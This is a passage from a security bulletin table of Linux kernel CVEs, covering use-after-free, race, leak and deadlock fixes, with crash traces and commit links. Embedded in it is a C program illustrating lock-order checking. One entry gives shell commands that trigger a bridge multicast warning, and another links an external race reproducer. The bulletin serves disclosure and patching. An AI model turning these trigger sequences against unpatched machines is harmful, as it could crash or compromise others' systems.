net/ipv4/route.c:1275 at ip_rt_bug+0x21/0x30, CPU#1 Call Trace: <TASK> ip_push_pending_frames+0x202/0x240 icmp_push_reply+0x30d/0x430 __icmp_send+0x1149/0x24f0 ip_options_compile+0xa2/0xd0 ip_rcv_finish_core+0x829/0x1950 ip_rcv+0x2d7/0x420 __netif_receive_skb_one_core+0x185/0x1f0 netif_receive_skb+0x90/0x450 tun_get_user+0x3413/0x3fb0 tun_chr_write_iter+0xe4/0x220 ... Fix this by checking rt2->rt_type after ip_route_input(). If it's RTN_LOCAL, the route cannot be used for output, so treat it as an error. The reproducer requires kernel modification to widen the race window, making it unsuitable as a selftest. It is available at: https://gist.github.com/mrpre/eae853b72ac6a750f5d45d64ddac1e81 | 2026-05-27 | not yet calculated | CVE-2026-45905 | https://git.kernel.org/stable/c/9a95ec9144eeff1fc6fbcc21b677e322c6f1430b https://git.kernel.org/stable/c/2c1f59005da9dd4b07b26984fd719e36557dc57c https://git.kernel.org/stable/c/b04061f89ffc6168e7ec3c71d0086ec3c3797228 https://git.kernel.org/stable/c/1c9ef28f643cce34a6a6c36c8f4d6d60a60db7e1 https://git.kernel.org/stable/c/423ce12d10b426709489d6b84fdaa6d2f31c5652 https://git.kernel.org/stable/c/81b84de32bb27ae1ae2eb9acf0420e9d0d14bf00 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: pf1550: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45906 | https://git.kernel.org/stable/c/1bdefeed904f1f17e1f73a4d8a035515f3a9fad8 https://git.kernel.org/stable/c/838767f5074700552d3f006d867caed65edc7328 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Fix deadlocks between devlink and netdev instance locks In the mentioned "Fixes" commit, various work tasks triggering devlink health reporter recovery were switched to use netdev_trylock to protect against concurrent tear down of the channels being recovered. But this had the side effect of introducing potential deadlocks because of incorrect lock ordering. The correct lock order is described by the init flow: probe_one -> mlx5_init_one (acquires devlink lock) -> mlx5_init_one_devl_locked -> mlx5_register_device -> mlx5_rescan_drivers_locked -...-> mlx5e_probe -> _mlx5e_probe -> register_netdev (acquires rtnl lock) -> register_netdevice (acquires netdev lock) => devlink lock -> rtnl lock -> netdev lock. But in the current recovery flow, the order is wrong: mlx5e_tx_err_cqe_work (acquires netdev lock) -> mlx5e_reporter_tx_err_cqe -> mlx5e_health_report -> devlink_health_report (acquires devlink lock => boom!) -> devlink_health_reporter_recover -> mlx5e_tx_reporter_recover -> mlx5e_tx_reporter_recover_from_ctx -> mlx5e_tx_reporter_err_cqe_recover The same pattern exists in: mlx5e_reporter_rx_timeout mlx5e_reporter_tx_ptpsq_unhealthy mlx5e_reporter_tx_timeout Fix these by moving the netdev_trylock calls from the work handlers lower in the call stack, in the respective recovery functions, where they are actually necessary. | 2026-05-27 | not yet calculated | CVE-2026-45907 | https://git.kernel.org/stable/c/4329514c61abefe4961541b128c549b017bab5ad https://git.kernel.org/stable/c/63f9d5fb4d8040077df801ca3270e2f02d55e0d9 https://git.kernel.org/stable/c/83ac0304a2d77519dae1e54c9713cbe1aedf19c9 |
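The lock-order inversion this entry describes is the classic AB/BA pattern that the kernel's lockdep reports at runtime. The following standalone C program is an added illustration of that check, not kernel code and not the mlx5e fix itself: it records the acquisition order of the probe path (devlink -> rtnl -> netdev) in a small lock-order graph and then replays the recovery path against it, flagging any acquisition that contradicts an already recorded (possibly transitive) ordering. The names `lock_graph_add` and `check_mlx5e_ordering` are this example's own, and the "after fix" trace assumes, as the description implies, that once netdev_trylock is moved into the recover callback it runs under the devlink lock that devlink_health_report already holds.

```c
#include <stdio.h>
#include <string.h>

/* Lock classes from the description. NR_LOCKS bounds the tables below. */
enum lock_class { DEVLINK = 0, RTNL = 1, NETDEV = 2, NR_LOCKS = 3 };
static const char *lock_name[NR_LOCKS] = { "devlink", "rtnl", "netdev" };

/* before[a][b] != 0: lock a has been seen held while lock b was acquired. */
struct lock_graph { unsigned char before[NR_LOCKS][NR_LOCKS]; };

/* One context's acquisition sequence, in the order the locks are taken. */
struct trace { const char *who; int locks[NR_LOCKS]; int n; };

/* Is there a recorded (possibly transitive) chain a -> ... -> b? */
static int reaches(const struct lock_graph *g, int a, int b, unsigned visited)
{
    if (a == b)
        return 1;
    if (visited & (1u << a))
        return 0;
    visited |= 1u << a;
    for (int x = 0; x < NR_LOCKS; x++)
        if (g->before[a][x] && reaches(g, x, b, visited))
            return 1;
    return 0;
}

/* Record a trace. Taking `taken` while `held` is held is an inversion when
 * the graph already says `taken` must come before `held`. Returns the count. */
static int lock_graph_add(struct lock_graph *g, const struct trace *t)
{
    int inversions = 0;

    for (int i = 0; i < t->n; i++) {
        int taken = t->locks[i];

        for (int j = 0; j < i; j++) {
            int held = t->locks[j];

            if (reaches(g, taken, held, 0)) {
                printf("%s: takes %s while holding %s, but %s -> %s is already recorded\n",
                       t->who, lock_name[taken], lock_name[held],
                       lock_name[taken], lock_name[held]);
                inversions++;
            }
            g->before[held][taken] = 1;
        }
    }
    return inversions;
}

/* Replay the sequences from the description. fixed == 0 models the work
 * handler taking netdev_trylock first; fixed != 0 models the trylock moved
 * into the recover callback, which runs under the devlink lock (assumption). */
int check_mlx5e_ordering(int fixed)
{
    struct lock_graph g;
    struct trace probe = { "register_netdevice via mlx5_init_one",
                           { DEVLINK, RTNL, NETDEV }, 3 };
    struct trace old_recovery = { "mlx5e_tx_err_cqe_work (before fix)",
                                  { NETDEV, DEVLINK }, 2 };
    struct trace new_recovery = { "mlx5e_tx_reporter_recover (after fix)",
                                  { DEVLINK, NETDEV }, 2 };
    int bad;

    memset(&g, 0, sizeof g);
    bad = lock_graph_add(&g, &probe);
    bad += lock_graph_add(&g, fixed ? &new_recovery : &old_recovery);
    return bad;
}

int main(void)
{
    printf("before fix: %d inversion(s)\n", check_mlx5e_ordering(0));
    printf("after fix:  %d inversion(s)\n", check_mlx5e_ordering(1));
    return 0;
}
```

The "before fix" replay reports one inversion (devlink taken while netdev is held, although devlink -> rtnl -> netdev was recorded first); the "after fix" replay is clean. The transitive check matters: the recovery path never touches rtnl, so a checker that only compared direct pairs would miss the cycle.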
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Fix memory leak in amdxdna_ubuf_map The amdxdna_ubuf_map() function allocates memory for sg and internal sg table structures, but it fails to free them if subsequent operations (sg_alloc_table_from_pages or dma_map_sgtable) fail. | 2026-05-27 | not yet calculated | CVE-2026-45908 | https://git.kernel.org/stable/c/5a68d2c99c859e6e8e36fa4e32749abf6d1fb66a https://git.kernel.org/stable/c/f9f4366d2ff93b07c2571561c776bd9a708078c3 https://git.kernel.org/stable/c/84dd57fb0359500092f1101409ca32091731490d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: cdns3: fix role switching during resume If the role changes while we are suspended, the cdns3 driver switches to the new mode during resume. However, switching to host mode in this context causes a NULL pointer dereference. The host role's start() operation registers an xhci-hcd device, but its probe is deferred while we are in the resume path. The host role's resume() operation assumes the xhci-hcd device is already probed, which is not the case, leading to the dereference. Since the start() operation of the new role is already called, the resume operation can be skipped. So skip the resume operation for the new role if a role switch occurs during resume. Once the resume sequence is complete, the xhci-hcd device can be probed in case of host mode. Unable to handle kernel NULL pointer dereference at virtual address 0000000000000208 Mem abort info: ... Data abort info: ... [0000000000000208] pgd=0000000000000000, p4d=0000000000000000 Internal error: Oops: 0000000096000004 [#1] SMP Modules linked in: CPU: 0 UID: 0 PID: 146 Comm: sh Not tainted 6.19.0-rc7-00013-g6e64f4aabfae-dirty #135 PREEMPT Hardware name: Texas Instruments J7200 EVM (DT) pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : usb_hcd_is_primary_hcd+0x0/0x1c lr : cdns_host_resume+0x24/0x5c ... Call trace: usb_hcd_is_primary_hcd+0x0/0x1c (P) cdns_resume+0x6c/0xbc cdns3_controller_resume.isra.0+0xe8/0x17c cdns3_plat_resume+0x18/0x24 platform_pm_resume+0x2c/0x68 dpm_run_callback+0x90/0x248 device_resume+0x100/0x24c dpm_resume+0x190/0x2ec dpm_resume_end+0x18/0x34 suspend_devices_and_enter+0x2b0/0xa44 pm_suspend+0x16c/0x5fc state_store+0x80/0xec kobj_attr_store+0x18/0x2c sysfs_kf_write+0x7c/0x94 kernfs_fop_write_iter+0x130/0x1dc vfs_write+0x240/0x370 ksys_write+0x70/0x108 __arm64_sys_write+0x1c/0x28 invoke_syscall+0x48/0x10c el0_svc_common.constprop.0+0x40/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x34/0x108 el0t_64_sync_handler+0xa0/0xe4 el0t_64_sync+0x198/0x19c Code: 52800003 f9407ca5 d63f00a0 17ffffe4 (f9410401) ---[ end trace 0000000000000000 ]--- | 2026-05-27 | not yet calculated | CVE-2026-45911 | https://git.kernel.org/stable/c/ff02bd303d2d78051771db51119d66c0cf442f47 https://git.kernel.org/stable/c/94c742614899ff18a6b3e6f3cfbe7b9f36c865f3 https://git.kernel.org/stable/c/d637f6ec149ffd2f8257bcc261561dc2e44dbb8c https://git.kernel.org/stable/c/56289298431ed76700b9aac27a3b1d929fe61b8d https://git.kernel.org/stable/c/fc086c0ce3db0eefbbeb66a5b1e626296336e33a https://git.kernel.org/stable/c/49c99dc247ebf7361db9dbdade3dcebfffaf2c22 https://git.kernel.org/stable/c/87e4b043b98a1d269be0b812f383881abee0ca45 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: don't cache extent during splitting extent Caching extents during the splitting process is risky, as it may result in stale extents remaining in the status tree. Moreover, in most cases, the corresponding extent block entries are likely already cached before the split happens, making caching here not particularly useful. Assume we have an unwritten extent, and then DIO writes the first half. [UUUUUUUUUUUUUUUU] on-disk extent U: unwritten extent [UUUUUUUUUUUUUUUU] extent status tree |<- ->| ----> dio write this range First, when ext4_split_extent_at() splits this extent, it truncates the existing extent and then inserts a new one. During this process, this extent status entry may be shrunk, and calls to ext4_find_extent() and ext4_cache_extents() may occur, which could potentially insert the truncated range as a hole into the extent status tree. After the split is completed, this hole is not replaced with the correct status. [UUUUUUU|UUUUUUUU] on-disk extent U: unwritten extent [UUUUUUU|HHHHHHHH] extent status tree H: hole Then, the outer calling functions will not correct this remaining hole extent either. Finally, if we perform a delayed buffer write on this latter part, it will re-insert the delayed extent and cause an error in space accounting. In addition, if the unwritten extent cache is not shrunk during the splitting, ext4_cache_extents() also conflicts with existing extents when caching extents. In the future, we will add checks when caching extents, which will trigger a warning. Therefore, do not cache extents that are being split. | 2026-05-27 | not yet calculated | CVE-2026-45912 | https://git.kernel.org/stable/c/8302b5b4aacdbb378f7b1216bb2ee782b5142415 https://git.kernel.org/stable/c/692103feca376ae4298c92aa8828015d20f1d87b https://git.kernel.org/stable/c/4c2d9dac4d328244f9365b0a1fa27ec802821820 https://git.kernel.org/stable/c/93b2ebbbcb2e63cfc21a1946dfe91d3aa7952036 https://git.kernel.org/stable/c/96007fd3c106aea773c1afae2d6f64cceb6da208 https://git.kernel.org/stable/c/5b1f4290453314e11cd8e15c7baa8a9b76c19b23 https://git.kernel.org/stable/c/9a2b95cdaf07785e2739199037bd9c0863ccc1be https://git.kernel.org/stable/c/8b4b19a2f96348d70bfa306ef7d4a13b0bcbea79 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: bridge: mcast: always update mdb_n_entries for vlan contexts syzbot triggered a warning[1] about the number of mdb entries in a context. It turned out that there are multiple ways to trigger that warning today (some got added during the years), the root cause of the problem is that the increase is done conditionally, and over the years these different conditions increased so there were new ways to trigger the warning, that is to do a decrease which wasn't paired with a previous increase. For example one way to trigger it is with flush: $ ip l add br0 up type bridge vlan_filtering 1 mcast_snooping 1 $ ip l add dumdum up master br0 type dummy $ bridge mdb add dev br0 port dumdum grp 239.0.0.1 permanent vid 1 $ ip link set dev br0 down $ ip link set dev br0 type bridge mcast_vlan_snooping 1 ^^^^ this will enable snooping, but will not update mdb_n_entries because in __br_multicast_enable_port_ctx() we check !netif_running $ bridge mdb flush dev br0 ^^^ this will trigger the warning because it will delete the pg which we added above, which will try to decrease mdb_n_entries Fix the problem by removing the conditional increase and always keep the count up-to-date while the vlan exists. In order to do that we have to first initialize it on port-vlan context creation, and then always increase or decrease the value regardless of mcast options. To keep the current behaviour we have to enforce the mdb limit only if the context is port's or if the port-vlan's mcast snooping is enabled. [1] ------------[ cut here ]------------ n == 0 WARNING: net/bridge/br_multicast.c:718 at br_multicast_port_ngroups_dec_one net/bridge/br_multicast.c:718 [inline], CPU#0: syz.4.4607/22043 WARNING: net/bridge/br_multicast.c:718 at br_multicast_port_ngroups_dec net/bridge/br_multicast.c:771 [inline], CPU#0: syz.4.4607/22043 WARNING: net/bridge/br_multicast.c:718 at br_multicast_del_pg+0x1bbe/0x1e20 net/bridge/br_multicast.c:825, CPU#0: syz.4.4607/22043 Modules linked in: CPU: 0 UID: 0 PID: 22043 Comm: syz.4.4607 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/24/2026 RIP: 0010:br_multicast_port_ngroups_dec_one net/bridge/br_multicast.c:718 [inline] RIP: 0010:br_multicast_port_ngroups_dec net/bridge/br_multicast.c:771 [inline] RIP: 0010:br_multicast_del_pg+0x1bbe/0x1e20 net/bridge/br_multicast.c:825 Code: 41 5f 5d e9 04 7a 48 f7 e8 3f 73 5c f7 90 0f 0b 90 e9 cf fd ff ff e8 31 73 5c f7 90 0f 0b 90 e9 16 fd ff ff e8 23 73 5c f7 90 <0f> 0b 90 e9 60 fd ff ff e8 15 73 5c f7 eb 05 e8 0e 73 5c f7 48 8b RSP: 0018:ffffc9000c207220 EFLAGS: 00010293 RAX: ffffffff8a68042d RBX: ffff88807c6f1800 RCX: ffff888066e90000 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: 0000000000000000 R08: ffff888066e90000 R09: 000000000000000c R10: 000000000000000c R11: 0000000000000000 R12: ffff8880303ef800 R13: dffffc0000000000 R14: ffff888050eb11c4 R15: 1ffff1100a1d6238 FS: 00007fa45921b6c0(0000) GS:ffff8881256f5000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fa4591f9ff8 CR3: 0000000081df2000 CR4: 00000000003526f0 Call Trace: <TASK> br_mdb_flush_pgs net/bridge/br_mdb.c:1525 [inline] br_mdb_flush net/bridge/br_mdb.c:1544 [inline] br_mdb_del_bulk+0x5e2/0xb20 net/bridge/br_mdb.c:1561 rtnl_mdb_del+0x48a/0x640 net/core/rtnetlink.c:-1 rtnetlink_rcv_msg+0x77e/0xbe0 net/core/rtnetlink.c:6967 netlink_rcv_skb+0x232/0x4b0 net/netlink/af_netlink.c:2550 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x80f/0x9b0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1894 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa68/0xad0 net/socket.c:2592 ___sys_sendmsg+0x2a5/0x360 net/socke ---truncated--- | 2026-05-27 | not yet calculated | CVE-2026-45913 | https://git.kernel.org/stable/c/d0fdad1bdd21a358cc2c85da3681ae27b86ce6ce https://git.kernel.org/stable/c/724a405ce0309676f1e993c173382b4c4a022beb https://git.kernel.org/stable/c/fae260fc84e1eae8f590c7907e53e8768df2d986 https://git.kernel.org/stable/c/45525fdfd4cb612d7b414dd5cfa1f43892a7cd71 https://git.kernel.org/stable/c/8b769e311a86bb9d15c5658ad283b86fc8f080a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "hwmon: (ibmpex) fix use-after-free in high/low store" This reverts commit 6946c726c3f4c36f0f049e6f97e88c510b15f65d. Jean Delvare points out that the patch does not completely fix the reported problem, that it in fact introduces a (new) race condition, and that it may actually not be needed in the first place. Various AI reviews agree. Specific and relevant AI feedback: " This reordering sets the driver data to NULL before removing the sensor attributes in the loop below. ibmpex_show_sensor() retrieves this driver data via dev_get_drvdata() but does not check if it is NULL before dereferencing it to access data->sensors[]. If a userspace process reads a sensor file (like temp1_input) while this delete function is running, could it race with the dev_set_drvdata(..., NULL) call here and crash in ibmpex_show_sensor()? Would it be safer to keep the original order where device_remove_file() is called before clearing the driver data? device_remove_file() should wait for any active sysfs callbacks to complete, which might already prevent the use-after-free this patch intends to fix. " Revert the offending patch. If it can be shown that the originally reported alleged race condition does indeed exist, it can always be re-introduced with a complete fix. | 2026-05-27 | not yet calculated | CVE-2026-45914 | https://git.kernel.org/stable/c/05112ba67c824ab416cd54307c0b50aba9f0047a https://git.kernel.org/stable/c/efd68429f23fb4015b0ebc2392334059e06fad18 https://git.kernel.org/stable/c/f448acd86835a650f9ea83460b9ca347d3aafba5 https://git.kernel.org/stable/c/914b47c9b824d3d74f31c764163edf93302100b1 https://git.kernel.org/stable/c/14a38784e09aebc21207dc32fffa05247fc3dd64 https://git.kernel.org/stable/c/894d9c7aab68fd0c70c78b1d03c8fa589fb0f67d https://git.kernel.org/stable/c/8bde3e395a85017f12af2b0ba5c3684f5af9c006 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fat: avoid parent link count underflow in rmdir Corrupted FAT images can leave a directory inode with an incorrect i_nlink (e.g. 2 even though subdirectories exist). rmdir then unconditionally calls drop_nlink(dir) and can drive i_nlink to 0, triggering the WARN_ON in drop_nlink(). Add a sanity check in vfat_rmdir() and msdos_rmdir(): only drop the parent link count when it is at least 3, otherwise report a filesystem error. | 2026-05-27 | not yet calculated | CVE-2026-45915 | https://git.kernel.org/stable/c/7fe0de287e931e07cb96ecf1f449b2ebdb0e1115 https://git.kernel.org/stable/c/9894c79fd9466612d0514be157b5c30cd93aa645 https://git.kernel.org/stable/c/cd569b87378b9c33ae13c23d6bb9d205d66f7c4b https://git.kernel.org/stable/c/d3b7ffa90f613938128432c7b2f35b7aa4bdd86b https://git.kernel.org/stable/c/955c5d670b5ae07c78f4345e23a895638db96ce1 https://git.kernel.org/stable/c/17866f8a0822d414cb02e621cf003a7d04396ef8 https://git.kernel.org/stable/c/d0bb592fa9def2bace90ac8926c0a1d6fa8c1aa0 https://git.kernel.org/stable/c/8cafcb881364af5ef3a8b9fed4db254054033d8a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: sbs-battery: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. Keep the old behavior of just printing a warning in case of any failures during the IRQ request and finishing the probe successfully. | 2026-05-27 | not yet calculated | CVE-2026-45916 | https://git.kernel.org/stable/c/ca7dd71773e4e050b0fb98768b7eae60f8d1f38b https://git.kernel.org/stable/c/f1f472b14ad56104ba228b8fbec60d5b21829913 https://git.kernel.org/stable/c/8010b745b436c3e1ca5dd960aa29fa3e0f6d8841 https://git.kernel.org/stable/c/2078830c32d1e49ac942c6f8c21f35c806ae5e94 https://git.kernel.org/stable/c/82d3eb97a976c9d56bb92b241397610e57a9c629 https://git.kernel.org/stable/c/861dda7a9074c0ff67788928165ae39d7f647491 https://git.kernel.org/stable/c/14d4dee5d8fb361bfff275832087254beab66d72 https://git.kernel.org/stable/c/8d59cf3887fbabacef53bfba473e33e8a8d9d07b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipvs: do not keep dest_dst if dev is going down There is a race between the netdev notifier ip_vs_dst_event() and the code that caches dst with dev that is going down. As the FIB can be notified for the closed device after our handler finishes, it is possible for a valid route to be returned and cached, resulting in a leaked dev reference until the dest is removed. To prevent a new dest_dst from being attached to dest just after the handler dropped the old one, add a netif_running() check to make sure the notifier handler is not currently running for a device that is closing. | 2026-05-27 | not yet calculated | CVE-2026-45917 | https://git.kernel.org/stable/c/64af43033503458c46023e56d6ae7bb0f824b55f https://git.kernel.org/stable/c/bae53b3baf2ff2f45f9205c438818fc055601a54 https://git.kernel.org/stable/c/024eb0bd19f507e6e7f0c7a7e5506d66b5dc1d3e https://git.kernel.org/stable/c/8fde939b0206afc1d5846217a01a16b9bc8c7896 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ovpn: tcp - don't deref NULL sk_socket member after tcp_close() When deleting a peer in case of keepalive expiration, the peer is removed from the OpenVPN hashtable and is temporarily inserted in a "release list" for further processing. This happens in: ovpn_peer_keepalive_work() unlock_ovpn(release_list) This processing includes detaching from the socket being used to talk to this peer, by restoring its original proto and socket ops/callbacks. In case of TCP it may happen that, while the peer is sitting in the release list, userspace decides to close the socket. This will result in a concurrent execution of: tcp_close(sk) __tcp_close(sk) sock_orphan(sk) sk_set_socket(sk, NULL) The last function call will set sk->sk_socket to NULL. When the releasing routine is resumed, ovpn_tcp_socket_detach() will attempt to dereference sk->sk_socket to restore its original ops member. This operation will crash due to sk->sk_socket being NULL. Fix this race condition by testing-and-accessing sk->sk_socket atomically under sk->sk_callback_lock. | 2026-05-27 | not yet calculated | CVE-2026-45918 | https://git.kernel.org/stable/c/f998b2c4bec487063a586695159f9a1856e81c56 https://git.kernel.org/stable/c/b9142cf4e066c825ec68752a7dcaceda700bbe26 https://git.kernel.org/stable/c/94560267d6c41b1ff3fafbab726e3f8a55a6af34 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/rt: Skip currently executing CPU in rto_next_cpu() CPU0 becomes overloaded when hosting a CPU-bound RT task, a non-CPU-bound RT task, and a CFS task stuck in kernel space. When other CPUs switch from RT to non-RT tasks, RT load balancing (LB) is triggered; with HAVE_RT_PUSH_IPI enabled, they send IPIs to CPU0 to drive the execution of rto_push_irq_work_func. During push_rt_task on CPU0, if next_task->prio < rq->donor->prio, resched_curr() sets NEED_RESCHED and after the push operation completes, CPU0 calls rto_next_cpu(). Since only CPU0 is overloaded in this scenario, rto_next_cpu() should ideally return -1 (no further IPI needed). However, multiple CPUs invoking tell_cpu_to_push() during LB increments rd->rto_loop_next. Even when rd->rto_cpu is set to -1, the mismatch between rd->rto_loop and rd->rto_loop_next forces rto_next_cpu() to restart its search from -1. With CPU0 remaining overloaded (satisfying rt_nr_migratory && rt_nr_total > 1), it gets reselected, causing CPU0 to queue irq_work to itself and send self-IPIs repeatedly. As long as CPU0 stays overloaded and other CPUs run pull_rt_tasks(), it falls into an infinite self-IPI loop, which triggers a CPU hardlockup due to continuous self-interrupts. The triggering scenario is as follows: cpu0 cpu1 cpu2 pull_rt_task tell_cpu_to_push <------------irq_work_queue_on rto_push_irq_work_func push_rt_task resched_curr(rq) pull_rt_task rto_next_cpu tell_cpu_to_push <-------------------------- atomic_inc(rto_loop_next) rd->rto_loop != next rto_next_cpu irq_work_queue_on rto_push_irq_work_func Fix redundant self-IPI by filtering the initiating CPU in rto_next_cpu(). This solution has been verified to effectively eliminate spurious self-IPIs and prevent CPU hardlockup scenarios. | 2026-05-27 | not yet calculated | CVE-2026-45919 | https://git.kernel.org/stable/c/d57d0746276a88ea43a2cc62b849fd8a95e32e41 https://git.kernel.org/stable/c/3b3c672a66db3de3b40f8a7057864bc1f874ede3 https://git.kernel.org/stable/c/16ca9f3117e9a294646c897daf08a5ab546c711b https://git.kernel.org/stable/c/8ad5577b2d4acfd83f03d97a0aece2d18aac5f07 https://git.kernel.org/stable/c/a6a73403733e86748421f2eeaf028c85683ef896 https://git.kernel.org/stable/c/52aeb1e07ec223caf212f036817976c98d2aa250 https://git.kernel.org/stable/c/9f25edc5a20cb52a5abbf25f0724bb4732b81801 https://git.kernel.org/stable/c/94894c9c477e53bcea052e075c53f89df3d2a33e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix dirtyclusters double decrement on fs shutdown fstests test generic/388 occasionally reproduces a warning in ext4_put_super() associated with the dirty clusters count: WARNING: CPU: 7 PID: 76064 at fs/ext4/super.c:1324 ext4_put_super+0x48c/0x590 [ext4] Tracing the failure shows that the warning fires due to an s_dirtyclusters_counter value of -1. IOW, this appears to be a spurious decrement as opposed to some sort of leak. Further tracing of the dirty cluster count deltas and an LLM scan of the resulting output identified the cause as a double decrement in the error path between ext4_mb_mark_diskspace_used() and the caller ext4_mb_new_blocks(). First, note that generic/388 is a shutdown vs. fsstress test and so produces a random set of operations and shutdown injections. In the problematic case, the shutdown triggers an error return from the ext4_handle_dirty_metadata() call(s) made from ext4_mb_mark_context(). The changed value is non-zero at this point, so ext4_mb_mark_diskspace_used() does not exit after the error bubbles up from ext4_mb_mark_context(). Instead, the former decrements both cluster counters and returns the error up to ext4_mb_new_blocks(). The latter falls into the !ar->len out path which decrements the dirty clusters counter a second time, creating the inconsistency. To avoid this problem and simplify ownership of the cluster reservation in this codepath, lift the counter reduction to a single place in the caller. This makes it more clear that ext4_mb_new_blocks() is responsible for acquiring cluster reservation (via ext4_claim_free_clusters()) in the !delalloc case as well as releasing it, regardless of whether it ends up consumed or returned due to failure. | 2026-05-27 | not yet calculated | CVE-2026-45920 | https://git.kernel.org/stable/c/523d5a4df3c649fa305c89efb552ec62a1ce9d3d https://git.kernel.org/stable/c/ca408af08544d96769c93a3d81a7f63f61129e95 https://git.kernel.org/stable/c/55576fa14771d33994c29a9ae960e07bb3f56c20 https://git.kernel.org/stable/c/dbc4e10619ed87a50e637b96f2e574df36a7a769 https://git.kernel.org/stable/c/61e372122b6d95aec940fdaea0a16f988f359897 https://git.kernel.org/stable/c/3924aea2c33df3864929c1acd178bfc29d8f005f https://git.kernel.org/stable/c/81982a11406c5da6c6e2b188028e7056e16b7128 https://git.kernel.org/stable/c/94a8cea54cd935c54fa2fba70354757c0fc245e3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: parsers: Fix memory leak in mtd_parser_tplink_safeloader_parse() The function mtd_parser_tplink_safeloader_parse() allocates buf via mtd_parser_tplink_safeloader_read_table(). If the allocation for parts[idx].name fails inside the loop, the code jumps to the err_free label without freeing buf, leading to a memory leak. Fix this by freeing the temporary buffer buf in the err_free label. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45921 | https://git.kernel.org/stable/c/0f5e62ea5c43146eacdc6861cb1022ffae1b79bc https://git.kernel.org/stable/c/e97f5fac8ce9a6b9ec724c97d86b0985e915fdca https://git.kernel.org/stable/c/ec121ad626c319085f6d40a52cd04e99b4554926 https://git.kernel.org/stable/c/971e9c53aed82f17a9c6a65daa4e21cc15eba5b1 https://git.kernel.org/stable/c/980ce2b02dd06a4fdf5fee38b2e14becf9cf7b8b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx5: Fix memory leak in GET_DATA_DIRECT_SYSFS_PATH handler The UVERBS_HANDLER(MLX5_IB_METHOD_GET_DATA_DIRECT_SYSFS_PATH) function allocates memory for the device path using kobject_get_path(). If the length of the device path exceeds the output buffer length, the function returns -ENOSPC but does not free the allocated memory, resulting in a memory leak. Add a kfree() call to the error path to ensure the allocated memory is properly freed. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45922 | https://git.kernel.org/stable/c/ee998cdbff6680891b0efd9d6ce53a388e5342c3 https://git.kernel.org/stable/c/b2bc649c18fbe8a7fd38d17266da3dcbfbcc44d2 https://git.kernel.org/stable/c/b3a10eca24fcfe913c0875e620f19596001bd6dc https://git.kernel.org/stable/c/9b9d253908478f504297ac283c514e5953ddafa6 |
